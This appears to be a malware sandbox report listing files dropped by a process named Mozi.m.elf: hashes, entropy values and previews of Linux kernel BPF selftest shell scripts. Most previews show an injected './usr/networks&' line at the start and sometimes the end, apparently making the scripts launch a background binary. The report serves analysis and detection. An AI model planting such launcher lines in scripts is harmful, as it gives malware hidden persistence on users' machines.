                                                              SHA-512:6B906A7B1FBB702B3BD470F970B7F5EF43DDD23D856C78F5CA61AFB804D0F843F492D87ED37C3DA974689F96FBDA2D12DEECA54EBB0044DF5F281369AF71F756
                                                              Malicious:false
                                                              Preview:./usr/networks&.# If one build fails, continue but return non-0 on exit..return_value() {..if [ -d "$TMPDIR" ] ; then...rm -rf -- $TMPDIR..fi..exit $ERROR.}.trap return_value EXIT..case $1 in..-h|--help)...echo -e "$0 [-j <n>]"...echo -e "\tTest the different ways of building bpftool."...echo -e ""...echo -e "\tOptions:"...echo -e "\t\t-j <n>:\tPass -j flag to 'make'."...exit...;;.esac..J=$*..# Assume script is located under tools/testing/selftests/bpf/. We want to start.# build attempts from the top of kernel repository..SCRIPT_REL_PATH=$(realpath --relative-to=$PWD $0).SCRIPT_REL_DIR=$(dirname $SCRIPT_REL_PATH).KDIR_ROOT_DIR=$(realpath $PWD/$SCRIPT_REL_DIR/../../../../).cd $KDIR_ROOT_DIR..check() {..local dir=$(realpath $1)...echo -n "binary: "..# Returns non-null if file is found (and "false" is run)..find $dir -type f -executable -name bpftool -print -exec false {} + && \...ERROR=1 && printf "FAILURE: Did not find bpftool\n".}..make_and_clean() {..echo -e "\$PWD: $PWD"..echo -e
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):3505
                                                              Entropy (8bit):5.101999997737958
                                                              Encrypted:false
                                                              SSDEEP:96:Iismhd58plWbPrueNH0e5nJeHPeh1Juie5s1eHaeJuT1j9Tt2DT+d:Iibd58eDqknMiJIj0XmG
                                                              MD5:84519E423ADA34395254E2A97E8275C2
                                                              SHA1:6D30E47A2EE5CCAA28BA383E5694271CFE338409
                                                              SHA-256:BAED396869873C4A7953F2C63FB78E30B2CBE68B33AA7C7AF2FC03FB9FBFB188
                                                              SHA-512:C4878320B03141FF070B8239C2505981FD3216F27B0F51F4F1FE56C7DD8165830759C69C22CF4010582E91509884CE504AA8CA4180B65FF4A1322C44052F5EDA
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..# This test needs to be run in a network namespace with in_netns.sh. Check if.# this is the case and run it with in_netns.sh if it is being run in the root.# namespace..if [[ -z $(ip netns identify $$) ]]; then..../net/in_netns.sh "$0" "$@"..exit $?.fi..# Determine selftest success via shell exit code.exit_handler().{..if (( $? == 0 )); then...echo "selftests: $TESTNAME [PASS]";..else...echo "selftests: $TESTNAME [FAILED]";..fi...set +e...# Cleanup..tc filter del dev lo ingress pref 1337 2> /dev/null..tc qdisc del dev lo ingress 2> /dev/null.../flow_dissector_load -d 2> /dev/null..if [ $unmount -ne 0 ]; then...umount bpffs 2> /dev/null..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..# Mount BPF file system.if /bin/mount | grep /sys/fs/bpf > /dev/null; then..echo "bpffs already mounted".else..echo "bpf
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1010
                                                              Entropy (8bit):5.220823243294136
                                                              Encrypted:false
                                                              SSDEEP:24:dpXvgl1FYPLVQt0KzCZbeO7zO7fNsiRVSddKXd3SVXaRZVM:dpYl1FMRQt9uZbeO7zO7fNsiRV6dKt3u
                                                              MD5:1429FE66BCE5BDB1C1BD9D1D6C397EEB
                                                              SHA1:20C1D8AFADA5DD4A3291ED54BFC11C8255F76993
                                                              SHA-256:B01345A8859D778A3BDD2D189E3E4D8F1C918D5803B531F61CB25A962CBE2302
                                                              SHA-512:99B2919EEB9BB93ADD1C00234F9185F17C6D5C480D276C0B2291DD7915AD242704F27DBFD8A76A24C2E5740F4C71BDE1DDD932CCD99796CBC071029C49EFD3A2
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..SRC_TREE=../../../../..test_run().{..sysctl -w net.core.bpf_jit_enable=$1 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$2 2>&1 > /dev/null...echo "[ JIT enabled:$1 hardened:$2 ]"..dmesg -C..if [ -f ${SRC_TREE}/lib/test_bpf.ko ]; then...insmod ${SRC_TREE}/lib/test_bpf.ko 2> /dev/null...if [ $? -ne 0 ]; then....rc=1...fi..else...# Use modprobe dry run to check for missing test_bpf module...if ! /sbin/modprobe -q -n test_bpf; then....echo "test_bpf: [SKIP]"...elif /sbin/modprobe -q test_bpf; then....echo "test_bpf: ok"...else....echo "test_bpf: [FAIL]"....rc=1...fi..fi..rmmod test_bpf 2> /dev/null..dmesg | grep FAIL.}..test_save().{..JE=`sysctl -n net.core.bpf_jit_enable`..JH=`sysctl -n net.core.bpf_jit_harden`.}..test_restore().{..sysctl -w net.core.bpf_jit_enable=$JE 2>&1 > /dev/null..sysctl -w net.core.bpf_jit_harden=$JH 2>&1 > /dev/null.}..rc=0.test_save.test_run 0 0.test_run 1 0.test_run 1 1.test_run 1 2.test_restore.exit $rc../usr/network
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):815
                                                              Entropy (8bit):5.201744181978782
                                                              Encrypted:false
                                                              SSDEEP:12:d1EHtVRnfZDWwV6O9EO7qHsv9KwaialTDsd6rVYrJREN2jjafDzt90dQfK4n:dMVbKs6AVqHsv9KrxlxrmTrjcD70dz4
                                                              MD5:6CE0DE76BD02CEB0CCD7F9EFECFE12D2
                                                              SHA1:CF040700C804B51EAF138D59014350AE29FA6F57
                                                              SHA-256:B4507BFFC19C0CAE1C5E51ED4C1DF7199ECD1050CC0BC221E9F0C0C9FA97BC91
                                                              SHA-512:88AF2876EE4E641CFA43BFC8F233110C106B01D99726AC45F1AB8DE9A51E34F3189695496C6E635AB7610E1AA1EC191B208A75A737BC4C3614F7FB8DF5C1255D
                                                              Malicious:false
                                                              Preview:./usr/networks&.# Determine selftest success via shell exit code.exit_handler().{..if [ $? -eq 0 ]; then...echo "selftests: $TESTNAME [PASS]";..else...echo "$TESTNAME: failed at file $LAST_LOADED" 1>&2...echo "selftests: $TESTNAME [FAILED]";..fi.}..libbpf_open_file().{..LAST_LOADED=$1..if [ -n "$VERBOSE" ]; then.. ./test_libbpf_open $1..else.. ./test_libbpf_open --quiet $1..fi.}..# Exit script immediately (well catched by trap handler) if any.# program/thing exits with a non-zero status..set -e..# (Use 'trap -l' to list meaning of numbers).trap exit_handler 0 2 3 6 9..libbpf_open_file test_l4lb.o..# Load a program with BPF-to-BPF calls.libbpf_open_file test_l4lb_noinline.o..# Load a program compiled without the "-target bpf" flag.libbpf_open_file test_xdp.o..# Success.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):578
                                                              Entropy (8bit):5.580525958294917
                                                              Encrypted:false
                                                              SSDEEP:12:9nt1L9fIymYVbR6XQlxeZ3qec7eZ30hc2GbxgWDaAJgxEd4n:ht1L9fp6ADeZ6HKZkq/bxjuAJgxEd4
                                                              MD5:87F640BAAB0006615A81B86FEB324304
                                                              SHA1:80D2E7ACB3CB4E4E3C96768D2D718B6A6E5C5EC7
                                                              SHA-256:46F504EA4EC509A4B684D9EEB87FF9C1CEB2FE1AE9A28205FCA3F349E29FE30F
                                                              SHA-512:A6AA809ADE6841AF63388319942C5A930DC80889850756D9590B61FDC564AB25128258D622B9849AC931CC9E817611C928811933E6163B7D57829D8BB5C0B976
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..GREEN='\033[0;92m'.RED='\033[0;31m'.NC='\033[0m' # No Color..modprobe rc-loopback..for i in /sys/class/rc/rc*.do..if grep -q DRV_NAME=rc-loopback $i/uevent..then...LIRCDEV=$(grep DEVNAME= $i/lirc*/uevent | sed sQDEVNAME=Q/dev/Q)...INPUTDEV=$(grep DEVNAME= $i/input*/event*/uevent | sed sQDEVNAME=Q/dev/Q)..fi.done..if [ -n $LIRCDEV ];.then..TYPE=lirc_mode2.../test_lirc_mode2_user $LIRCDEV $INPUTDEV..ret=$?..if [ $ret -ne 0 ]; then...echo -e ${RED}"FAIL: $TYPE"${NC}..else...echo -e ${GREEN}"PASS: $TYPE"${NC}..fi.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):12942
                                                              Entropy (8bit):5.326261520608179
                                                              Encrypted:false
                                                              SSDEEP:384:DNIBI3p2eSvOMJOuTyL21J+wIm/13pI210:D6Kp2eWXT0wIq13pI210
                                                              MD5:5663197F18E21DBEE3F75DB935185DAE
                                                              SHA1:8E4143001A8E3656960C7FA11C7E2A2F1EB3DBFB
                                                              SHA-256:96C78B0925035DA39102A42C3DDC2F0B16144C86508B06C3D143A639EFD62076
                                                              SHA-512:D7021F9CFD085ECD1669E5A96F3FC3144126530ED4E746A3059FBEE3D7E3D250BE1F6DBFA34C8F3318A6FB0ADCBD533FD1A097A8792B063732FC9EB124FE7209
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..readonly NS1="ns1-$(mktemp -u XXXXXX)".readonly NS2="ns2-$(mktemp -u XXXXXX)".readonly NS3="ns3-$(mktemp -u XXXXXX)"..readonly IPv4_1="172.16.1.100".readonly IPv4_2="172.16.2.100".readonly IPv4_3="172.16.3.100".readonly IPv4_4="172.16.4.100".readonly IPv4_5="172.16.5.100".readonly IPv4_6="172.16.6.100".readonly IPv4_7="172.16.7.100".readonly IPv4_8="172.16.8.100".readonly IPv4_GRE="172.16.16.100"..readonly IPv4_SRC=$IPv4_1.readonly IPv4_DST=$IPv4_4..readonly IPv6_1="fb01::1".readonly IPv6_2="fb02::1".readonly IPv6_3="fb03::1".readonly IPv6_4="fb04::1".readonly IPv6_5="fb05::1".readonly IPv6_6="fb06::1".readonly IPv6_7="fb07::1".readonly IPv6_8="fb08::1".readonly IPv6_GRE="fb10::1"..readonly IPv6_SRC=$IPv6_1.readonly IPv6_DST=$IPv6_4..TEST_STATUS=0.TESTS_SUCCEEDED=0.TESTS_FAILED=0..TMPFILE=""..process_test_results().{..if [[ "${TEST_STATUS}" -eq 0 ]] ; then...echo "PASS"...TESTS_SUCCEEDED=$((TESTS_SUCCEEDED+1))..else...echo "FAIL"...TESTS_FAILED=$((TESTS_FAIL
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4595
                                                              Entropy (8bit):4.759233094756956
                                                              Encrypted:false
                                                              SSDEEP:48:9+dS8OIs4J6TSSGKvFUUWPO+UqUzxSdU8YpYjUjC7NfYjX8QD:cp7odrSC7WYjCqjX88
                                                              MD5:B2FD1A65727D7D547BE1A5BF89A413C2
                                                              SHA1:CBE271C6A674C5F722844876727B395103222C8B
                                                              SHA-256:F293BC5B50C83CC9218D5247B196B75F08645850A020A8111B7AECFFF8920FAA
                                                              SHA-512:D6B5F33DF09E6F60B02243AF2C9971EA59997D9B6004B753D23513A9DFD104CC13C5B792A64F21E99BC6F46158AADDA3B866643603E7CB6906B5E5C28C9C3A39
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..TMP_FILE="/tmp/selftest_lwt_seg6local.txt"..cleanup().{..if [ "$?" = "0" ]; then...echo "selftests: test_lwt_seg6local [PASS]";..else...echo "selftests: test_lwt_seg6local [FAILED]";..fi...set +e..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..ip netns del ns4 2> /dev/null..ip netns del ns5 2> /dev/null..ip netns del ns6 2> /dev/null..rm -f $TMP_FILE.}..set -e..ip netns add ns1.ip netns add ns2.ip netns add ns3.ip netns add ns4.ip netns add ns5.ip netns add ns6..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2.ip link add veth3 type veth peer name veth4.ip link add veth5 type veth peer name veth6.ip link add veth7 type veth peer name veth8.ip link add veth9 type veth peer name veth10..ip link set veth1 netns ns1.ip link set veth2 netns ns2.ip link set veth3 netns ns2.ip link set veth4 netns ns3.ip link set veth5 netns ns3.ip link set veth6 netns ns4.ip link set veth7 netns ns4.ip link
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):983
                                                              Entropy (8bit):5.4677073569376216
                                                              Encrypted:false
                                                              SSDEEP:24:L/uELj8SFuFhN/n/kJg6xsK4jkZFpsrpy4Z8I4NJmwYSJtyEE:L//L3Zx94CcbrEnYSc
                                                              MD5:564EF28E81C3F1C042AC5F894B0C0E8E
                                                              SHA1:C7C5DF90F4489C94C16489EBC74E5EA0FD01A3FB
                                                              SHA-256:D4C71542C8F8F69453D200E625BD7C36F4BC84CE38E9A95A5462D1FED58A9EE3
                                                              SHA-512:57DC61E2FA2786747BA13B4E6BCB73BEF8EE72FF894D766AFCA44711FF30E85D1A92805E504450197BD94ED5672F1835C883D04765BAEF37D77A9166E5339B5A
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...wait_for_ip...tc qdisc add dev ${TEST_IF} clsact..tc filter add dev ${TEST_IF} egress bpf obj ${BPF_PROG_OBJ} \...sec ${BPF_PROG_SECTION} da...BPF_PROG_ID=$(tc filter show dev ${TEST_IF} egress | \....awk '/ id / {sub(/.* id /, "", $0); print($1)}').}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup..${PROG} ${TEST_IF} ${BPF_PROG_ID}.}..DIR=$(dirname $0).TEST_IF="test_cgid_1".TEST_IF_PEER="test_cgid_2".MAX_PING_TRIES=5.BPF_PROG_OBJ="${DIR}/test_skb_cgroup_id_kern.o".BPF_PROG_SECTION="cgroup_id_logger".BPF_PROG_ID=0.PROG="${DIR}/test_skb_cgroup_id_user".type ping6 >/dev/null 2>&1 && PING6="ping6" || PING6="ping -6"..main../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):684
                                                              Entropy (8bit):5.360388977189686
                                                              Encrypted:false
                                                              SSDEEP:12:wW/+j9boHrFB8JHQFbqOQFJP4av9bfB44v9bvHJpbg9JpJyizdQuvM9Xs0T+CvGt:L/uELj8SFuFF4EDB4+7ppsrpy4MXsfLh
                                                              MD5:42E3B4F746976F0CAC55AEF91D587353
                                                              SHA1:6B8C6DE3531ADA0A3CB20D073D546C36534E0B6A
                                                              SHA-256:BC8663FC965F917432E546D66EA1078E76D8C4526EF4CCC78FC72111FC71A5EF
                                                              SHA-512:F51402D79D2F18866294A0F0235A156F0C09976B20077EFF0BDB4B6E0BCB24A9B0CD1C94F15023C133AD8B7D70B60C2740498920272818440A12A413C08427E0
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..setup().{..# Create testing interfaces not to interfere with current environment...ip link add dev ${TEST_IF} type veth peer name ${TEST_IF_PEER}..ip link set ${TEST_IF} up..ip link set ${TEST_IF_PEER} up...ip -4 addr add ${TEST_IPv4} dev ${TEST_IF}..ip -6 addr add ${TEST_IPv6} dev ${TEST_IF}..wait_for_ip.}..cleanup().{..ip link del ${TEST_IF} 2>/dev/null || :..ip link del ${TEST_IF_PEER} 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup.../test_sock_addr setup_done.}..BASENAME=$(basename $0 .sh).TEST_IF="${BASENAME}1".TEST_IF_PEER="${BASENAME}2".TEST_IPv4="127.0.0.4/8".TEST_IPv6="::6/128".MAX_PING_TRIES=5..main../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2541
                                                              Entropy (8bit):5.348844603657122
                                                              Encrypted:false
                                                              SSDEEP:48:rVmWClCN3NSauOhnkBxyCKj7XtLI6HOeSB+7:nQi9Sa7dWEj7XlI6H/wy
                                                              MD5:486AB5DADB683D5FDFC6BE511C3D830D
                                                              SHA1:4E2A9023191D7C10655D50C068640D9B14993093
                                                              SHA-256:5350A91A41B37C4FF9DCE4348A4FDB6C10BCE729B1091C697B053942383CAC39
                                                              SHA-512:5980A62AB39F9CE5AEE3353E4D55C5D3F45DA7EA3DDC82820C3E3F04ECE63A41420705B53D37DEE1F6E952BB119C0AB735A674E28BE9B229847B66BDD04BB32F
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# check that nc, dd, and timeout are present.command -v nc >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v dd >/dev/null 2>&1 || \..{ echo >&2 "nc is not available"; exit 1; }.command -v timeout >/dev/null 2>&1 || \..{ echo >&2 "timeout is not available"; exit 1; }..readonly NS_SRC="ns-src-$(mktemp -u XXXXXX)".readonly NS_DST="ns-dst-$(mktemp -u XXXXXX)"..readonly IP_SRC="172.16.1.100".readonly IP_DST="172.16.2.100"..cleanup().{..ip netns del ${NS_SRC}..ip netns del ${NS_DST}.}..trap cleanup EXIT..set -e # exit on error..ip netns add "${NS_SRC}".ip netns add "${NS_DST}".ip link add veth_src type veth peer name veth_dst.ip link set veth_src netns ${NS_SRC}.ip link set veth_dst netns ${NS_DST}..ip -netns ${NS_SRC} addr add ${IP_SRC}/24 dev veth_src.ip -netns ${NS_DST} addr add ${IP_DST}/24 dev veth_dst..ip -netns ${NS_SRC} link set dev veth_src up.ip -netns ${NS_DST} link set dev veth_dst up..ip -netns ${NS_SRC} route add ${IP_D
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5339
                                                              Entropy (8bit):5.0017094276510194
                                                              Encrypted:false
                                                              SSDEEP:96:VNvN4NzN8QxGMuQIHov8MJBeWzS2Dna5Z+kv6jyrm46:bqPVTpu2EFcB
                                                              MD5:7D056F227B2C6686912434BD207F49A9
                                                              SHA1:B548FD6A982296E69B285B72674229EAAE224C6E
                                                              SHA-256:64E38DDDC941634D982632417F5DF6194B3FA4801C4A835CC38BC268A5C20FFD
                                                              SHA-512:D4865E9EF38F9C76AEEF424521E8056B5C507CD4B95B83182A9C6F09F1AD6A859D5927B34820B84B71E5C823C1720309119BF3D35914199647713B22D398AF10
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1..fi.}..set -e..# no arguments: automated test, run all.if [[ "$#" -eq "0" ]]; then..echo "ipip"..$0 ipv4 ipip none 100...echo "ip6ip6"..$0 ipv6 ip6tnl none 100...echo "sit"..$0 ipv6 sit none 100...for mac in none mpls eth ; do...echo "ip gre $mac"...$0 ipv4 gre $mac 100....echo "ip6 gre $mac"...$0 ipv6 ip6gre $mac 100....echo "ip gre $mac gso"...$0 ipv4 gre $mac 2000....echo "ip6 gre $mac gso"...$0 ipv6 ip6gre $mac 2000....echo "ip udp $mac"...$0 ipv4 udp $mac 100....echo "ip6 udp $mac"...$0 ipv6 ip6udp $mac 100....echo "ip udp $mac gso"...$0 ipv4 udp $mac 2000....echo "ip6 udp $mac gso"...$0 ipv6 ip6udp $mac 2000..done...echo "OK. All tests passed"..exit 0.fi..if [[ "$#" -ne "4" ]]; then..echo "Usage: $0"..echo " or: $0 <ipv4|ipv6> <tuntype> <none|mpls|eth> <data_len>"..exit 1.fi..case "$1" in."ipv4")..readonly addr1="${ns1_v4}"..readonly addr2="${ns2_v4}"..readonly ipproto=4..readonly netcat_opt=-${ipproto}..readonly foumod=fou..readonly foutype=ipip..reado
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:C source, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1353
                                                              Entropy (8bit):5.4396025488101865
                                                              Encrypted:false
                                                              SSDEEP:24:Ha7/uT8HyHhKF4mA5I49I4SJHK4M4SdXBBbs4txX/Rp9FQb1:ECmfxdJq4Mdd4y4h
                                                              MD5:2DAFC47BEFAB85E3AA67C94BB37209D4
                                                              SHA1:DE81DD3C51199D946742ACBD45F51F702EB2B841
                                                              SHA-256:CAEBE8046B018B5B70A7A1BF914076882A5B50B1F92ED142A483255431F992FF
                                                              SHA-512:1E97B52366221DA2310A39E16B0010F874091E5D90C3D55221C8B6B5CE5DA5EC32B51F24A943CA185BBB961CB1CDBDAFE736AF34D99FF7707CCFDE9CE99BD817
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..get_prog_id().{..awk '/ id / {sub(/.* id /, "", $0); print($1)}'.}..ns1_exec().{..ip netns exec ns1 "$@".}..setup().{..ip netns add ns1..ns1_exec ip link set lo up...ns1_exec sysctl -w net.ipv4.tcp_syncookies=2..ns1_exec sysctl -w net.ipv4.tcp_window_scaling=0..ns1_exec sysctl -w net.ipv4.tcp_timestamps=0..ns1_exec sysctl -w net.ipv4.tcp_sack=0...wait_for_ip 127.0.0.1..wait_for_ip ::1.}..cleanup().{..ip netns del ns1 2>/dev/null || :.}..main().{..trap cleanup EXIT 2 3 6 15..setup...printf "Testing clsact..."..ns1_exec tc qdisc add dev "${TEST_IF}" clsact..ns1_exec tc filter add dev "${TEST_IF}" ingress \...bpf obj "${BPF_PROG_OBJ}" sec "${CLSACT_SECTION}" da...BPF_PROG_ID=$(ns1_exec tc filter show dev "${TEST_IF}" ingress | \... get_prog_id)..ns1_exec "${PROG}" "${BPF_PROG_ID}"..ns1_exec tc qdisc del dev "${TEST_IF}" clsact...printf "Testing XDP..."..ns1_exec ip link set "${TEST_IF}" xdp \...object "${BPF_PROG_OBJ}" section "${XDP_SECTION}"..BPF_PROG_ID=
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1912
                                                              Entropy (8bit):5.207312592924516
                                                              Encrypted:false
                                                              SSDEEP:24:Yq3bFI7wapJJVcYJJVwYJ5YJSBYJJVPERkm9qQrBrdB/hthTlQirzR3h3h1KkxJ0:5apJJVHJJVDJ2JSOJJVPekmkkqP
                                                              MD5:CB6386382686DC790D4B284A63DD8B25
                                                              SHA1:B2602353A56E69BE26A9963A6D53CA4FE8A6A339
                                                              SHA-256:F44683183AE55B02B07982FBD765DCC6EBB40EB3C1DF2AE70A47DFE75416A073
                                                              SHA-512:AB990DB5698E05B3CC2E79078005C8F7B44D2F2D5374A951ECB1E20326E72FCE98E3B25EC37EA8C7AD0B4C82498F6173A445BB86F5CF8EA685E379910BC6F224
                                                              Malicious:false
                                                              Preview:./usr/networks&.cleanup_exit().{..echo "CATCH SIGKILL or SIGINT, cleanup and exit"..cleanup..exit 0.}..check().{..ip link help 2>&1 | grep -q "\s$1\s"..if [ $? -ne 0 ];then...echo "SKIP $1: iproute2 not support"..cleanup..return 1..fi.}..enable_debug().{..echo 'file ip_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ip6_gre.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file vxlan.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file geneve.c +p' > /sys/kernel/debug/dynamic_debug/control..echo 'file ipip.c +p' > /sys/kernel/debug/dynamic_debug/control.}..check_err().{..if [ $ret -eq 0 ]; then...ret=$1..fi.}..bpf_tunnel_test().{..local errors=0...echo "Testing GRE tunnel..."..test_gre..errors=$(( $errors + $? ))...echo "Testing IP6GRE tunnel..."..test_ip6gre..errors=$(( $errors + $? ))...echo "Testing IP6GRETAP tunnel..."..test_ip6gretap..errors=$(( $errors + $? ))...echo "Testing ERSPAN tunnel..."..test_erspan v2..errors=$(( $errors + $? ))...echo "Testing
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):902
                                                              Entropy (8bit):4.342773839740934
                                                              Encrypted:false
                                                              SSDEEP:12:xqgzdQEeMHrFzBZSvuNJ/Ez7Mv96zgyirwNVrwFQUAvQ5Dm2Qe7Qs8RBe8K4n:oEJVKU5q1bhNqOUF5Dae8/Yb4
                                                              MD5:AEB56524F126B615817DE51165E003B4
                                                              SHA1:ECDE1434B22AFDB0E893A8EE52C03F02D07FC016
                                                              SHA-256:80B96271B9151951A445595FB8659CB0F67F1664D6F1E0EA6B516EB232A8F32F
                                                              SHA-512:55A3DC79B34150506C49E3C93C48919ED18FDEBA27966F5F115B089A4DA25B55D7A93B6D1ADF119A23159424F116DAA227918DC8699D44D7EA09C5C4F22A12D5
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 type veth peer name veth2..ip link set veth1 netns ns1.ip link set veth2 netns ns2..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth1.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth2..ip netns exec ns1 tc qdisc add dev veth1 clsact.ip netns exec ns2 tc qdisc add dev veth2 clsact..ip netns exec ns1 tc filter add dev veth1 ingress bpf da obj test_xdp_meta.o sec t.ip netns exec ns2 tc filter add dev veth2 ingress bpf da obj test_xdp_meta.o sec t..ip netns exec ns1 ip link set dev veth1 xdp obj test_xdp_meta.o sec x.ip netns exec ns2 ip link set dev veth2 xdp obj test_xdp_meta.o sec x..ip netns exec ns1 ip link set dev veth1 up.ip netns exec ns2 ip link set dev veth2 up..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):767
                                                              Entropy (8bit):4.374876194795111
                                                              Encrypted:false
                                                              SSDEEP:12:xqgzdQEeTrFVrFrJZrWZoJOW84q3fQoc7QwMRMZQLP4OQ5EBe8K4n:oEOzNFdoooc8P1LPo5EYb4
                                                              MD5:3FBEA0F5A3A44C38DE78FA04A8F20F4C
                                                              SHA1:DF6CAEBDC0B41681A8D9F6EB93A57170E491CF0F
                                                              SHA-256:4F9AF779F4D8072518504184058911B20A557043C48EC5A305AEF58A298ABDE5
                                                              SHA-512:F7F4EF184A07ADAF93216546B6172835E3E67DE788B3330C1F6B3E3CB2840CFD41EB226267FC4EE6A0FBD872FE1B43439770F156417DC42220B54B3295FA5293
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.fi.set -e..ip netns add ns1.ip netns add ns2..trap cleanup 0 2 3 6 9..ip link add veth1 index 111 type veth peer name veth11.ip link add veth2 index 222 type veth peer name veth22..ip link set veth11 netns ns1.ip link set veth22 netns ns2..ip link set veth1 up.ip link set veth2 up..ip netns exec ns1 ip addr add 10.1.1.11/24 dev veth11.ip netns exec ns2 ip addr add 10.1.1.22/24 dev veth22..ip netns exec ns1 ip link set dev veth11 up.ip netns exec ns2 ip link set dev veth22 up..ip link set dev veth1 xdpgeneric obj test_xdp_redirect.o sec redirect_to_222.ip link set dev veth2 xdpgeneric obj test_xdp_redirect.o sec redirect_to_111..ip netns exec ns1 ping -c 1 10.1.1.22.ip netns exec ns2 ping -c 1 10.1.1.11..exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2423
                                                              Entropy (8bit):5.128034697458766
                                                              Encrypted:false
                                                              SSDEEP:48:KNfi7s/PHSdG16qZuH8Pa5yOU4I3dfa6E7vc45SWs:K5ZydWoH8P6pwfvE7vccSWs
                                                              MD5:1B96D7C2944C0FE933D088AEA9AD7E46
                                                              SHA1:ACB6C2FE43224F93E4C4624D2E12D7C8408D2055
                                                              SHA-256:7A429BC65F7DD3FFF35DC43515956C5800AB1225F8A57B114563EEB7DA391EFE
                                                              SHA-512:40EEAE893DDAB845EB650662E4BF29BB7946881CEEB08A9ABA126B44ABE6590D2355593948F99E938B838F896E0801278563241DA15909FF48352BCAFBDBE608
                                                              Malicious:false
                                                              Preview:./usr/networks&.BPF_FS=$(awk '$3 == "bpf" {print $2; exit}' /proc/mounts).BPF_DIR=$BPF_FS/test_$TESTNAME.._cleanup().{..set +e..ip link del veth1 2> /dev/null..ip link del veth2 2> /dev/null..ip link del veth3 2> /dev/null..ip netns del ns1 2> /dev/null..ip netns del ns2 2> /dev/null..ip netns del ns3 2> /dev/null..rm -rf $BPF_DIR 2> /dev/null.}..cleanup_skip().{..echo "selftests: $TESTNAME [SKIP]".._cleanup...exit $ksft_skip.}..cleanup().{..if [ "$?" = 0 ]; then...echo "selftests: $TESTNAME [PASS]"..else...echo "selftests: $TESTNAME [FAILED]"..fi.._cleanup.}..if [ $(id -u) -ne 0 ]; then..echo "selftests: $TESTNAME [SKIP] Need root privileges"..exit $ksft_skip.fi..if ! ip link set dev lo xdp off > /dev/null 2>&1; then..echo "selftests: $TESTNAME [SKIP] Could not run test without the ip xdp support"..exit $ksft_skip.fi..if [ -z "$BPF_FS" ]; then..echo "selftests: $TESTNAME [SKIP] Could not run test without bpffs mounted"..exit $ksft_skip.fi..if ! bpftool version > /dev/null 2>&1; then..
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4755
                                                              Entropy (8bit):5.148825786731255
                                                              Encrypted:false
                                                              SSDEEP:96:zOaoILqMju/udWB40aU10oi8JWAiWRRCQP+SR0XcyM5c72lCSgy4Y7:zTLLqMKd4tUqoi8NmHNslCNNY7
                                                              MD5:C179F5E1062459B06C0F899FEFDB2B3B
                                                              SHA1:6832CAFFD1D52F776101A94E5A5CC4DBC95D4AFC
